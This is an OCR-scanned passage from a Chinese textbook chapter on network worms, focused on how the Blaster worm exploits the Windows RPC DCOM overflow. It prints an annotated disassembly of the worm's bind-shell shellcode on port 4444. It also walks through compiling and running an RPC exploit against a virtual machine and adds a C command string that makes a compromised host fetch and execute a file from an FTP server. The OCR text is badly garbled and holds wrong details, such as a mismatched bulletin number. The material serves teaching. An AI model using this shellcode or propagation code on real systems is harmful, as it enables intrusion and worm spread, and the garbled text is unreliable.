Web 脚本 、U 盘 和 网 络 共享 等 。 

4. 传播 速度 快 

在 单机 上 ,病毒 只 能 通过 被 动 方 法 (如 复制 .下 载 、 共 享 等 ) 从 一 台 计 算 机 扩散 到 男 一 台 
计算 机 。 而 在 网 络 中 则 可 以 通过 网 络 通信 机 制 , 借 助 高 速 电缆 进 行 迅 速 扩散 。 由 于 蠕虫 病 
毒 在 网 络 中 传染 速度 非常 快 , 因 此 其 扩散 范围 很 大 。 蠕 虫 不 但 能 迅速 传染 局 域 网 内 所 有 计 
算 机 ,还 能 通过 远程 工作 站 将 蠕虫 病毒 在 一 瞬间 传播 到 千里 之 外 。 

5. 清除 难度 大 


在 单机 中 ,再 项 固 的 病毒 也 可 通过 删除 市 毒 文 件 、 低 级 格式 化 便 盘 等 措施 将 病毒 清除 。 
而 网 络 中 只 要 有 一 台 工 作 站 未 能 将 病毒 查 杀 干净 就 可 使 整个 网 络 重 新 全 部 被 病毒 感染 , 甚 
至 刚刚 完成 杀毒 工作 的 一 台 工 作 站 马上 就 能 被 网 上 另 一 台 工 作 站 的 融 毒 程序 所 传染 。 因 
此 ,仅仅 对 单机 进行 病毒 杀 除 不 能 彻底 解决 网 络 蠕虫 病毒 的 问题 。 

6. 破坏 性 强 

网 络 中 蠕虫 病毒 将 直接 影响 网 络 的 工作 状态 , 轻 则 降低 速度 ,影响 工作 效率 , 重 则 造成 
网 络 系统 的 次 痪 ,破坏 服务 需 系 统 资 源 , 使 多 年 的 工作 毁 于 一 旦 。 


7.3 蠕虫 病毒 的 机 制 


从 编程 的 角度 来 看 ,蠕虫 病毒 由 两 部 分 组 成 : 主 程序 和 引导 程序 。 主 程序 一 旦 在 计算 
机 中 建立 ,就 可 以 开始 收集 与 当前 计算 机 联网 的 其 他 计算 机 的 信息 。 它 能 通过 读 取 公共 配 
置 文件 并 检测 当前 计算 机 的 联网 状态 信息 ,尝试 利用 系统 的 缺陷 在 远程 计算 机 上 建立 引导 
程序 。 引 导 程 序 负责 把 " 晴 虫 "病毒 市 人 它 所 感染 的 每 一 台 计 算 机 中 。 

主 程序 中 最 重要 的 是 传播 模块 。 传 播 模块 实现 了 日 动人 侵 功 能 ,这 是 蠕虫 病毒 能 力 的 
最 高 体现 。 传 播 模 块 可 以 党 统 地 分 为 扫描 、 攻 击 和 复制 3 个 步骤 。 

(1) 扫描 师 虫 的 扫描 功能 主要 负责 探测 远程 主机 的 漏洞 ,这 模拟 了 攻防 的 Scan 过 程 。 
当 里 虫 回 茶 个 主机 发 送 探测 洗 洞 的 信息 并 收 到 成 功 的 应 答 后 ,就 得 到 了 一 个 潜在 的 传播 
对 象 。 

(2) 攻击 病毒 按 特定 漏洞 的 攻击 方法 对 潜在 的 传播 对 象 进 行 目 动 攻击 ,以 取得 该 主机 
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的 合适 权限 ,为 后 续 步 又 做 准备 。 

(3) 复制 在 特定 权限 下 ,复制 功能 实现 蠕虫 引导 程序 的 远程 建立 工作 , 即 把 引导 程序 复 
制 到 攻击 对 象 上 。 

蠕虫 程序 常 驻 于 一 台 或 多 台 计 算 机 中 ,并 具有 自动 重新 定位 (Auto Relocation) 的 能 力 。 
如 果 它 检测 到 网 络 中 的 某 台 计算 机 未 被 占用 , 它 就 把 自身 的 一 个 复制 发 送 给 那 台 计算 机 。 
每 个 程序 段 都 能 把 自身 的 复制 重新 定位 于 男 一 台 计 算 机 中 ,并 且 能 够 识别 出 它 自己 所 占用 
的 计算 机 。 

最 早 的 蠕虫 病毒 是 针对 IRC 的 蠕虫 程序 。 这 类 病毒 在 20 世纪 90 年 代 早 期 曾经 广泛 
流行 ,但 是 随 着 即时 聊天 系统 的 普及 和 基于 浏览 器 的 阅读 方式 逐渐 成 为 交流 的 主要 方式 ,这 
种 病毒 出 现 的 机 会 也 就 越 来 越 小 了 。 

当前 流行 的 蠕虫 病毒 主要 采用 一 些 已 公开 的 漏洞 .脚本 以 及 电子 邮件 等 进行 传播 。 


7.4 基于 RPC 漏洞 的 蠕虫 


本 节 主 要 研究 冲击 波 病毒 如 何 利用 微软 RPC 漏洞 获取 目标 机 器 最 高 权限 ,并且 深 入 了 
解 冲击 波 这 种 蠕虫 的 攻击 模式 ,以 及 学 习 Shell 以 及 Socket 编程 原理 。 


7.4.1 RPC 漏洞 


远程 过 程 调 用 (Remote Procedure Call, RPC) 是 Windows 操作 系统 使 用 的 一 个 协议 。 
RPC 提供 了 一 种 进程 间 通 信 机 制 , 通 过 这 一 机 制 ,在 一 台 计 算 机 上 运行 的 程序 可 以 顺畅 地 
执行 某 个 远程 系统 上 的 代码 。 该 协议 本 身 是 从 OSF( 开 放 式 软件 基础 )RPC 协议 衍生 出 来 
的 ,只 是 增加 了 一 些 Microsoft 特定 的 扩展 。 

RPC 中 处 理 通过 TCP/IP 的 消息 交换 的 部 分 有 一 个 漏洞 。 此 问题 是 由 错误 地 处 理 格 
式 造成 的 。 当 存在 RPC 远程 执行 漏洞 (MS08-067) 的 系统 收 到 攻击 者 构造 的 RPC 请 求 时 ， 
可 能 允许 远程 执行 恶意 代码 ,引起 安装 程序 、 查 看 或 更 改 、 删 除数 据 或 者 是 建立 系统 管理 员 
权限 的 账户 等 ,而 无 须 通 过 认证 。 在 Windows 2000、Windows XP 和 Windows Server 2003 
系统 中 ,利用 这 一 漏洞 ,攻击 者 可 以 通过 恶意 构造 的 网 络 包 直接 发 起 攻击 ,无 须 通 过 认证 地 
运行 任意 代码 ,并 且 获 取 完 整 的 权限 。 

这 种 特定 的 漏洞 影响 分 布 式 组 件 对 象 模 型 (DCOMD) 与 RPC 间 的 一 个 接口 ,此 接口 侦 听 
TCP/IP 端口 135。 为 利用 此 汤 洞 ,攻击 者 可 能 需要 问 远 程 计算 机 上 的 135 端口 发 送 特殊 格 
式 的 请 求 。 

已 经 发 现 一 些 程序 存在 此 类 漏洞 ,Samba 是 一 套 实现 SMB(Server Messages Block) 协 
议 、 跨 平台 进行 文件 共享 和 打印 共享 服务 的 程序 。Samba 在 处 理 用 户 数据 时 存在 输入 验证 
漏洞 ,远程 攻击 者 可 能 利用 此 漏洞 在 服务 器 上 执行 任意 命令 。 

Samba 中 负责 在 SAM 数据 库 更 新 用 户口 令 的 代码 未 经 过 滤 便 将 用 户 输入 传输 给 了 
/bin/sh。 如 果 在 调用 smb. conf 中 定义 的 外 部 脚本 时 ,通过 对 /bin/sh 的 MS-RPC 调用 提 
交 了 恶意 输入 的 话 ,就 可 能 允许 攻击 者 以 nobody 用 户 的 权限 执行 任意 命令 。 
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7.4.2 冲击 波 病 毒 


2003 年 7 月 16 日 ,微软 公司 发 布 T“RPC 接口 中 的 缓冲 区 洲 出 ?的 漏洞 补丁 。 该 漏洞 
存在 于 RPC 中 处 理 通过 TCP/IP 的 消息 交换 的 部 分 ,攻击 者 通过 TCP 135 端口 ,回迁 程 计 
算 机 发 送 特殊 形式 的 请 求 ,允许 攻击 者 在 目标 机 器 上 获得 完全 的 权限 并 且 可 以 执行 任意 的 
代码 。 

恶意 代码 制造 者 迅即 抓 住 了 这 一 机 会 ,首先 制作 出 了 一 个 利用 此 汤 洞 的 蠕虫 。 俄 罗斯 
著名 反 病 毒 厂商 Kaspersky Labs 于 2003 年 8 月 4 日 捕获 了 这 个 恶意 代码 ,并 发 布 了 命名 
为 Worm. Win32. Autorooter 恶意 代码 的 信息 ,也 就 是 “冲击 波 ”。 在 短 短 几 周 的 时 间 里 ,就 
导致 了 大 量 网 络 瘫痪 ,造成 了 数 十 亿美 元 的 损失 。“ 冲 击 波 ” 的 攻击 行为 如 下 。 

(1) 冲击 波 运 行 时 会 将 自身 复制 到 window 目录 下 ,并 命名 为 msblast. exe。 

(2) 冲击 波 运行 时 会 在 系统 中 建立 一 个 名 为 BILLY 的 互 斥 量 , 目 的 是 冲击 波 只 保证 在 
内 存 中 有 一 份 副 本 ,为 了 避免 用 户 发 现 。 

(3) 冲击 波 运行 时 会 在 内 存 中 建立 一 个 名 为 msblast. exe 的 进程 ,该 进程 就 是 活 的 病毒 体 。 

(4) 冲击 波 会 修改 注册 表 ,在 


HKEY LOCAL MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 


中 添加 键 值 


"windows auto update" = "msblast. exe" 


这 样 就 可 以 保证 每 次 启动 系统 时 ,冲击 波 都 会 自动 运行 。 

(5) 冲击 波 体 内 隐藏 有 一 段 文 本 信息 : I just want to say LOVE YOU SAN!! Billy 
gates why do you make this possible ? Stop making money and fix your software!! 

(6) 冲击 波 会 以 20s 为 间隔 ,每 20s 检测 一 次 网 络 状态 , 当 网 络 可 用 时 ,冲击 波 会 在 本 
地 的 UDP/69 端口 上 建立 一 个 tftp 服务 器 ,并 启动 一 个 攻击 传播 线程 ,不 断 地 随机 生成 攻 
击 地 址 ,进行 攻击 。 男 外 该 病毒 攻击 时 ,会 首先 搜索 子 网 的 IP 地 址 ,以 便 就 近 攻 击 。 

(7) 当 冲 击 波 扫 描 到 计算 机 后 ,就 会 加 目标 计算 机 的 TCP135 端口 发 送 攻 击 数据 。 

(8) 当 冲 击 波 攻 击 成 功 后 , 便 会 监听 目标 计算 机 的 
TCP4444 端口 作为 后 门 ,并 绑 定 cmd. exe。 然 后 蠕 虫 会 
连接 到 这 个 端口 ,发 送 TFTP 命令 , 回 连 到 发 起 进攻 的 @ I Me 
主机 ,将 msblast. exe 传 到 目标 计算 机 上 并 运行 。 

(9) 当 冲 击 波 攻 击 失败 时 ,可 能 会 造成 没有 打 补 丁 人 


| 消息 
的 Windows 系统 RPC 服务 崩溃 (图 7-1), Windows XP 六 
系统 可 能 会 日 动 重 启 计 算 机 。 该 蠕虫 不 能 成 功 攻击 


Windows Server 2003, 但 是 可 以 造成 Windows Server 
2003 系统 的 RPC 服务 朋 江 ,默认 情况 下 是 系统 反复 图 7-1 ”冲击波 的 中 毒 症状 
重启 。 

(10) 冲击 波 检测 到 当前 系统 月 份 是 8 月 之 后 或 者 日 期 是 15 日 之 后 ,就 会 问 微软 的 更 
新 站 点 发 动 拒绝 服务 攻击 ,使 微软 网 站 的 更 新 站 点 无 法 为 用 户 提供 服务 。 


系 较 美 科 
eI 
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:00401000 90 
:00401001 90 
:00401002 90 
:00401003 EB19 
:00401005 5E 


:00401006 31C9 
:00401008 81E989FFFFFF 
:0040100E 813680BF3294 
:00401014 81EEFCFFFFFF 
:0040101A E2F2 
:0040101C EB05 
:0040101E E8E2FFFFFF 


;此 处 开始 的 代码 已 被 还 原 : 


:00401023 83EC34 
:00401026 8BF4 
:00401028 E847010000 
:0040102D 8906 
:0040102F FF36 
:00401031 688E4E0EEC 
:00401036 E861010000 
:0040103B 894608 
:0040103E FF36 
:00401040 68ADD905CE 


:00401045 E852010000 
:0040104A 89460C 
:0040104D 686C6C0000 
:00401052 6833322E64 
:00401057 687773325F 
:0040105C 54 
:0040105D FF5608 
:00401060 894604 


:00401063 FF36 
:00401065 6872FEB316 
:0040106A E82D010000 
:0040106F 894610 
:00401072 FF36 
:00401074 687ED8E273 
:00401079 E81E010000 
:0040107E 894614 
:00401081 FF7604 
:00401084 68CBEDFC3B 
:00401089 E80E010000 
:0040108E 894618 
:00401091 FF7604 
:00401094 68D909F5AD 


冲击 波 的 shellcode 分 析 


nop 
nop 

nop 

jmp 0040101E 
pop esi 


XOr eCx, ecx 


sub ecx, FFFFFF89 == 一 77 
xor dword ptr [esi], 9432BF80 


sub esi, FFFFFFFC 
loop 0040100E 
Jmp 00401023 
call 00401005 


sub esp, 00000034 

mov esi, esp 

call 00401174 

mov dword ptr [esi], eax 
push dword ptr [esil] 
push ECOE4E8E 

call 0040119C 


mov dword ptr [esi+ 08], eax 


push dword ptr [esil] 
push CE05D9RD 


call 0040119C 


mov dword ptr [esi+ 0C], eax 


push 00006C6C 
push 642E3233 
push 5F327377 
push esp 


;esi = 00401023, 从 00401023 地 址 开 
; 始 的 代码 将 要 被 还 原 , 实际 上 esi 
;指向 的 地 址 在 堆栈 中 是 不 固定 的 


;ecx= 77h 
;还 原 从 00401023 开始 被 加 密 的 代码 


;add esi,4 


;还 原 已 完成 , 跳 到 被 还 原 的 代码 处 执行 
;这 条 指令 相当 于 push 00401023, jmp 
;00401005 两 条 指令 的 集合 


;esi 一 一 > 变量 表 
;eax = 77e40000h = hkerne132 


; = 77e40000h 
;LoadLibraryYyR 字符 串 的 自 定 义 编码 


;= 77e605d8h 

; = 77e40000h 

;WaitEorSingle0bject 字符 串 的 自 定 
; 义 编码 


;= 77e59d5bh 


2 WwWS2 32.011 
让 一 一 人 WE 二 并 


call LoadLibraryA -一 > WS2_32.dl1 


mov dword ptr [esi+ 04], eax 


push dword ptr [esi] 
push 16B3FE72 
call 0040119C 


mov dword ptr [esi+ 10], eax 


push dword ptr [esi] 
push 73E2D87E 
call 0040119C 


mov dword ptr [esi+14], eax 


push [esi+ 04] 
push 3BFCEDCB 
call 0040119C 


mov dword ptr [esi+ 18], eax 


push [esi+ 04] 
push ADF509D9 


; = 71a20000h(ws2 32.dll 在 内 存 里 


;的 地 址 ) 
; = 77e40000h 


; CreateProcessR 字符 串 的 自 定 义 编码 


; = 77e40000h 
;ExitProcess 字符 串 的 自 定 义 编码 


; = 71a20000h 
;WSAStartup 字符 串 的 目 定 义 编 码 


; = 71a20000h 
;WSASocketA 字符 串 的 自 定 义 编 码 


:00401099 E8FE000000 
:0040109E 89461C 
:004010RA1 FF7604 
:004010A4 68A41A70C7 
:004010A9 E8EE000000 
:004010AE 894620 
:004010B1 FF7604 
:004010B4 68A4AD2EE9 
:004010B9 E8DE000000 
:004010BE 894624 
:004010C1 FF7604 
:004010C4 68E5498649 
:004010C9 E8CE000000 
:004010CE 894628 
:004010D1 FF7604 
:004010D4 68E779C679 
:004010D9 E8BE000000 
:004010DE 89462C 
:004010E1 33FF 
:004010E3 81EC90010000 
:004010E9 54 
:004010EA 6801010000 
:004010EF FF5618 
:004010F2 50 
:004010F3 50 
:004010F4 50 
:004010F5 50 
:004010F6 40 
:004010F7 50 
:004010F8 40 
:004010F9 50 
:004010FA FF561C 
:004010FD 8BD8 
:004010FF 57 
:00401100 57 
:00401101 680200115C 
:00401106 8BCC 
:00401108 6A16 
:0040110A 51 
:0040110B 53 
:0040110C FF5620 
:0040110F 57 
:00401110 53 
:00401111 FF5624 
:00401114 57 
:00401115 51 
:00401116 53 
:00401117 FF5628 


:0040111A 8BD0 
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call 0040119C 
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mov dword ptr [esi+ 1C], eax 


push [esi+04] 
push C7701AA4 
call 0040119C 


; = 71a20000h 
;bind 字符 串 的 自 定义 编码 


mov dword ptr [esi+ 20], eax 


push [esi+ 04] 
push E92EADA4 
call 0040119C 


;=71a20000h 
;listen 字符 串 的 自 定 义 编码 


mov dword ptr [esi+ 24]，eax 


push [esi+ 04] 
push 498649E5 
call 0040119C 


;= 71a20000h 
;accept 字符 串 的 自 定义 编码 


mov dword ptr [esi+ 28], eax 


push [esi+ 04] 
push 79C679E7 
call 0040119C 


;= 71a20000h 
;closesocket 字符 串 的 自 定义 编码 


mov dword ptr [esi+ 2C], eax 


xor edi, edi 

sub esp, 00000190 
push esp 

push 00000101 
call WSAStartup 
push eax= 0 

push eax= 0 

push eax= 0 

push eax = 0 

inc eax=1 

push eax = 1 

inc eax= 2 

push eax = 2 

call WSASocketA 
mov ebx, eax = 010ch 
push edi = 0 

push edi= 0 


push 5C110002 ;port = 4444 


mov ecx, esp 
push 00000016h 
push ecx 

push ebx 

call bind 

push edi= 0 
push ebx 

call listen 
push edi=0 
push ecx = 0a2340 
push ebx 

call accept 


;在 堆栈 里 分 配 临 时 空间 0x190 字 节 


;wsock 1.1 
;启动 WINSOCK 1.1 库 


ep pp 
; 建立 用 于 监听 的 TCP SOCKET 


;sockaddr_in 结构 没有 填 好 , 少 了 4 字 贡 
;ecx——>0200115c0000000000000000 
;这 个 参数 应 该 是 10h 
;ecx——>0200115c000000000000000 
;hsocket 


; 绑 定 4444 端口 

;hsocket 

;4444 端口 开始 进入 监听 状态 

;这 个 参数 好 像 有 问题 ,可 能 是 0 
;hsocket 

;接受 攻击 主机 的 连接 ,开始 接收 对 方 传 
;来 的 DOS 命令 


mov edx, eax = 324h, handle of socket to translate 
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:0040111C 6865786500 push 00657865 

:00401121 68636D642E push 2E646D63 ;" Cmd. exe" 

:00401126 896630 mov dword ptr [esi+ 30], esp -一 >"cmd. exe" 
PROCESS INFORMATION STRUCT 

hProcess DWORD ? 

hThread DWORD ? 

dwProcessId DWORD ? 

dwThreadId DWORD ? 


PROCESS_INFORMATION ENDS 
STARTUPINFO STRUCT 


00 cb DWORD ? ;44h 

04 lpReserved DWORD ? 

08 lpDesktop DWORD ? 

0c lpTitle DWORD ? 

10 dwX DWORD ? 

14 dwY DWORD ? 

18 dwXSize DWORD ? 

lc dwYSize DWORD ? 

20 dwXCountChars DWORD ? 

24 dwYCountChars DWORD ? 

28 dwFillAttribute DWORD ? 

2c dwFlags DWORD ? ;100h, set STARTF USESTDHANDLES flags 

30 wShowWindow WORD 

32 cbReserved2 WORD  ? 

34 lpReserved2 DWORD ? 

38 hStdInput DWORD ? ;hsocket 

3c hStdOutput DWORD ? ;hsocket 

40 hStdError DWORD ? ;hsocket 

STARTUPINFO ENDS 

valve of dwFlags: 

STARTF USESHOWWINDOW equ 1h 

STARTF USESIZE equ 2h 

STARTF USEPOSITION equ 4h 

STARTF USECOUNTCHARS equ 8h 

STARTF USEFILLATTRIBUTE equ 10h 

STARTF RUNFULLSCREEN equ 20h 

STARTF FORCEONFEEDBACK equ 40h 

STARTF FORCEOFFFEEDBACK equ 80h 

STARTF USESTDHANDLES equ 100h 

:00401129 83EC54 sub esp, 00000054 = sizeof STARTUPINFO(10h) + 
sizeof PROCESS INFOMATION(44h) 

:0040112C 8D3C24 lea edi, dword ptr [esp] 

:0040112F 33C0 XOr eax, eax 

:00401131 33C9 XOr eCx, eCx 

:00401133 83C115 add ecx, 00000015 ;ecx = 15h 

:00401136 AB stosd ;临时 内 存 清 零 ,完成 后 EDI-- >"cmd. 

;exe" 
:00401137 E2FD loop 00401136 
:00401139 C644241044 mov [esp+ 10], 44 ;sizeof PROCESS INFOMATION 


:0040113E FE44243D inc [esp+3D=3C+1] ;0->1 ;dwFlags = 0100h 
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:00401142 89542448 mov dword ptr [esp+ 48]，edx = hsocket = 324 ;hStdInput 

:00401146 8954244C mov dword ptr [esp+ 4C], edx = hsocket = 324 ;hStdOutput 

:0040114A 89542450 mov dword ptr [esp+ 50]，edx = hsocket = 324 ;hStdError 

填充 STARTUPINFO 结构 的 字段 ,使 cmd. exe 的 Input, 0utput, Error 都 指向 hsocket, 所 以 hsocket 收 到 
的 tftp — i xx. xx. xx. xx get msblast. exe、start msblast. exe 和 msblast. exe 字符 串 数 据 都 作为 输入 
cmd. exe 的 D0S 命令 执行 ,也 就 是 通信 socket 和 cmd. exe 绑 定 在 一 起 . 

:0040114E 8D442410 lea eax, dword ptr [esp+ 10] 

:00401152 54 push esp -一 > retval save to PROCESS INFOMATION struct 


:00401153 50 push eax -一 > STARTUPINFO struct 


:0040115E 51 
:0040115F FF5610 


:00401162 8BCC 
:00401164 6AFF 


:00401166 FF31 
:00401168 FF560C 


:0040116B 8BC8 


:0040116D 57 
:0040116E FF562C 


:00401171 FF5614 


:00401154 51 push ecx=0 ;path 

:00401155 51 push ecx= 0 ;temp Var 

:00401156 51 push ecx=0 ;flag 

:00401157 6A01 push 00000001 ;允许 当前 进程 中 的 所 有 句柄 都 由 新 建 的 子 
;进程 继承 

:00401159 51 push ecx= 0 

:0040115A 51 push ecx=0 

:0040115B FF7630 push [esi+30] -一 >"cmd. exe" 


push ecx= 0 

call CreateProcessA =1 ;建立 cmd. exe 进程 ,从 hsocket 接收 input， 
;output 

mov ecx, esp ——> 4403000048030000e8030000e4030000, 44h, 15 dup(0) 
ecx——> hProcess = 344, hThread = 348, dwProcessID = 3e8, dwThreadID = 3e4 
push FFFFFFFF = INFINITE 
push dword ptr [ecx] 


call WaitForSingleObject 


;hProcess = 0344 

;无 限 等 待 cmd. exe, 接收 攻击 主机 传 来 在 被 
;攻击 主机 的 cmd. exe 里 执行 的 DOS 命令 : 
;tftp — i xx. xx. xx. xx get msblast. exe 和 
;start msblast. exe, 把 病毒 体 下 载 到 被 攻击 
;主机 并 马上 运行 病毒 

;CMD 进程 退出 后 WaitForSingleObject 返回 
;这 里 继续 运行 


moOV ecx, eax =0 


push edi 一 一 >"cmd. exe" 
call closesocket ;这 里 好 像 有 错误 ,参数 应 该 是 hsocket, 而 不 
;是 edi 

;退出 svchost. exe 进程 , 倒 记 时 60s 重新 启动 


call ExitProcess 


; 自 带 的 GET KERNEL32 模块 BASE 的 子 程式 


:00401174 55 
:00401175 56 


push ebp 
push esi 


:00401176 64A130000000mov eax, dword ptr fs:[00000030 ] 


:0040117C 85C0 
:0040117E 780C 


:00401180 8B400C 
:00401183 8B701C 


:00401186 AD 
:00401187 8B6808 
:0040118A EB09 
:0040118C 8B4034 


test eax, eax 

js 0040118C 

mov eax, dword ptr [eax+ 0C] 
mov esi, dword ptr [eax+ 1C] 
lodsd 

mov ebp, dword ptr [eax+ 08] 
Jmp 00401195 

mov eax, dword ptr [eax+ 34| 


:0040118F 8BA8B8000000 mov ebp, dword ptr [eax+ 000000B8 ] 


:00401195 8BC5 


mov eax, ebp 
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:00401197 5E pop esi 
:00401198 5D pop ebp 
:00401199 C20400 ret 0004 ; 自 带 的 GetProcAddress 子 程式 


x Referenced by a CALL at Addresses: 
:00401036 ，:00401045 ，:0040106A ，:00401079 ，:00401089 


:0040119C 53 
:0040119D 55 
:0040119E 56 
:0040119F 57 
:004011A0 8B6C2418 
:004011A4 8B453C 
:004011A7 8B540578 
:004011AB 03D5 
:004011AD 8B4A18 
:004011B0 8B5A20 
:004011B3 03DD 
:004011B5 E332 
:004011B7 49 
:004011B8 8B348B 
:004011BB 03F5 
:004011BD 33FF 
:004011BF FC 
:004011C0 33C0 
:004011C2 AC 
:004011C3 3AC4 
:004011C5 7407 
:004011C7 C1CF0D 
:004011CA 03F8 
:004011CC EBF2 
:004011CE 3B7C2414 
:004011D2 75E1 
:004011D4 8B5A24 
:004011D7 03DD 
:004011D9 668B0C4B 
:004011DD 8B5A1C 
:004011E0 03DD 
:004011E2 8B048B 
:004011E5 03C5 
:004011E7 EB02 
:004011E9 33C0 
:004011EB 8BD5 
:004011ED 5F 
:004011EE 5E 
:004011EF 5D 
:004011F0 5B 
:004011F1 C20400 


push ebx 

push ebp 

push esi 

push edi ;esp——> edi,esi,ebp, ebx, eip, API name, hModule 
mov ebp, dword ptr [esp+18] = module base 

mov eax, dword ptr [ebp+ 3C] = PE head 

mov edx, dword ptr [ebp + eax+ 78] = outport table 


add edx, ebp ;edx——> outport table 

mov ecx, dword ptr [edx+ 18] ;num of api 
mov ebx, dword ptr [edx+ 20] ;addr of api name table 
add ebx, ebp 

]jcxz 004011E9 

dec ecx 


mov esi, dword ptr [ebx+ 4 * ecx] 
add esi, ebp 

xor edi, edi 

cld 

XOr eax, eax 

lodsb 

cmp al, ah 

je 004011CE 

ror edi, OD 

add edi, eax 

jmp 004011C0 

cmp edi, dword ptr [esp+14] 
jne 004011B5 

mov ebx, dword ptr [edx+ 24] 
add ebx, ebp 

mov Cx, word ptr [ebx+ 2 *x ecx] 
mov ebx, dword ptr [edx+ 1C] 
add ebx, ebp 

mov eax, dword ptr [ebx+ 4 * ecx] 
add eax, ebp 

jmp 004011EB 

XOr eax, eax 

mov edx, ebp 

pop edi 

pop esi 

pop ebp 

pop ebx 

ret 0004 
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7.4.4 ”冲击波 实 验 


本 实验 采用 利用 RPC DCOM 漏洞 的 shellcode, 在 知道 所 要 攻击 机 器 的 IP 地 址 以 及 机 
锅 类 型 ,并 且 没 有 安装 冲击 波 病毒 补丁 的 情况 下 能 够 攻击 成 功 ,可 以 用 来 演示 冲击 波 病毒 的 
攻击 过 程 。 

1. 实验 环境 

实验 所 需 的 系统 软件 为 : 

VMWare Workstation 7. 0. 1 

Windows 2000 Advance Server SP1 

虚拟 机 中 操作 系统 : 

攻击 方 Linux(Ubuntu8. 04) 

攻击 对 象 Windows 2000 Advance Server SP1 

实验 素材 : experiments 目录 的 RPC 目录 下 。 

虚拟 机 映像 : vituralmachine 目录 下 的 PRCVM。 

2. 实验 准备 

(1) 环境 安装 。 安 装 虚 拟 机 VMWare, 并 在 其 中 分 别 安 装 Linux 以 及 Windows 2000 
操作 系统 。 如 果 直 接 下 载 虚拟 机 映像 文件 , 则 可 以 省 去 该 部 分 。 

(2) 源码 准备 。 从 电子 资源 中 复制 病毒 程序 源码 vdcom. c 到 Linux 任意 目录 中 ,之 后 
的 编译 运行 等 工作 都 在 此 目录 中 进行 。 如 宁 下 接 下 载 虚拟 机 映像 文件 , 则 源码 已 经 存在 于 
相关 目录 中 。 

(3) 编译 源码 。 使 用 gcc 编译 源码 : gcc -o rpcattack vdcom. c, 生 成 文件 rpcattack , 如 
图 7-2 所 示 。 并 检查 文件 是 否 生成 。 


ruby@uby-desktop:~/ 文 档 $ gcc -0 rpcattack vdcom.c 
vdcom.c; 在 函数 ' rain ' 中 : 
vdcom.c:369: 警告 : 内 建 函 数 “memcpy” 不 兼容 的 隐 式 声明 


ruby@uby-desktop :~/ 文 档 季 


7-2 编译 源码 


3. 开始 实验 

首先 确保 目标 虚拟 机 Windons 2000 打开 ,并 检查 C 盘 根 目 录 下 没有 多 余 实 验 用 文件 。 
然后 运行 病毒 程序 ,输入 /rpcattack ,可 以 看 到 输入 参数 如 图 7-3 所 示 。 

由 于 是 攻击 演示 ,因此 需要 知道 目标 机 硕 操 作 系统 的 类 型 和 版 本 ,用 以 设置 不 同 的 偶 移 
量 ( 本 实验 中 目标 机 各 类 型 为 45) 。 

运行 /rpcattack 45 目标 IP 地 址 ,进行 shellcode 的 注入 。 如 果 攻 击 成 功 ,那么 即 可 获得 
目标 机 需 的 管理 员 权 限 ,进行 各 种 操作 ,如 图 7-4 所 示 。 

退出 后 ,检查 目标 机 如 端 口 状态 ,可 发 现 135 端口 已 被 关闭 ,如 图 7-5 所 示 。 

4. 扩展 功能 

可 以 开启 FTP 服务 或 者 利用 公共 FTP, 在 Shell 函数 中 添加 两 行 代码 : 
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char x cmd= "cd. .&cd. . &echo open [ftp 的 ip 地 址 ]>> o&echo [用 户 名 ]>> o&echo [密码 ]>> o&echo 
user [用 户 名 ] [密码 ]>> o&echo bin >> o&echo get 
iexplorer. exe >> o&echo bye 之 o&ftp — s:o&iexplorer. exe&del o&exit\n"; 


send( sock, cmd, strlen(cmd), 0); 


这 样 就 可 以 在 获取 目标 权限 后 日 动 下 载 文 件 并 运行 ,完成 蠕虫 病毒 的 自我 复制 ,传播 等 


功能 ,如 图 7-6 所 示 。 


Remte DCOM RPC Buffer Overflow Expiloit 
- Original code by FlashSky and Benjurry 


Rewr itten by HDM 


- autoroot /worm by volkam 
Fixed and Beefed by Legion2000 Security Research 


- Usage: 


.trun <Target ID> <Target 1P> 


- Targets: 


- 0 


和 
2 


a a . 
mn nm 


一 
己 


Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 


Windows 


NT SP4 (english) 

NT SP5 (chineese) 
NT SP6 {chineese) 
NT SP6a (chineese) 
2000 NCSP (polish) 
2000 SP3 (polish) 
2000 SP4 {spanish) 
2000 NOSP1 (english) 
2000 NCSP2 {english) 
2000 SP2-1 {english) 
2000 SP2-2 (english) 


图 7-3 程序 用 法 


- Rerote DCOM RPC Buffer Overflow Exploit 
Original code by FlashSky and Benjurry 
- Rewritten by HDM 


ayutoroot /worm by volkam 
Fixed and Beefed by Legion2000 Security Research 
- Using return address of 0x010016c6 


Dropping to System Shell... 


Microsoft Wndows 2000 [Version 5.00.2195] 
[C) EQ 1985-2000 Microsoit Corp. 


C:\WNDONB'\systemB2>cd. .&cd. .&dir 


cd . .&cd. .adir 


06006660 C 和 [他 信 处 的 


< o> 1CAC-8260 


:58 
:56 
:52 
:19 
:27 


<DIR> Do curents and Settings 
<DIR> Ine tpub 


<DIR> Program Files 
23,175 test.jpg 
<DIR> WI NDOWS 


1 O00 O 23 ,175 仿 
4 Oy: 7,039 ,184 ,896 6066b 


7-4 ”成功 攻击 目标 
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:netstat -na 


Active Connections 


Active Connections 


> 
本 日 
六 

pd 


fddress Forecign filddress State 

:25 .08.9.8: LISTENING 
:38 LISTENING 
:135 LISTENING 
:443 LISITENING 
3445 LISTENING 
:1825 LISTENING 
:1026 LISTENING 
:1827 LISTENING 
:1830 LISTENING 
:3372 LISTENING 
:9189 LISTENING 
116.132:1: LISTENING 
:135 
:445 
:1828 
:1829 
:3456 
-116 .132 
-116.132 
-116 .132 


State 

LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENI NG 
LISTENING 
LISTENING 
LISTENING 
:8 LISTENING 
-189.155 :21 TIME_WAIT 


Proto 
TCP 
CPP 
TCP 
TCP 
TGP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP Eo sl6.1232: 


(a) 攻击 前 (b) 攻击 后 


图 7-5 目标 机 器 攻击 前 后 端口 状态 对 比 


乌 
[= 


L 蜂 求 来 案 慰 杯 BE 
a 


-red a a i 
妈 交 加 回国 国名 国 国 国人 多 加 2 了 


-上 


-四 - 
-日 - 
-8. 
-@. 
-向 . 
-日 


回国 国 加 回回 上 0 


DD 国 回国 国 
国 国 加 回回 加 回回 


Rm 


回国 国 国 回国 回国 回国 加 
区 


本 辐 国 加 加 加 加 加 加 回避 


-a 
回回 回回 回回 回回 加 加 DOBm 人 mm 


-HOGGOmDOOmmm pb.. 


| 


| 


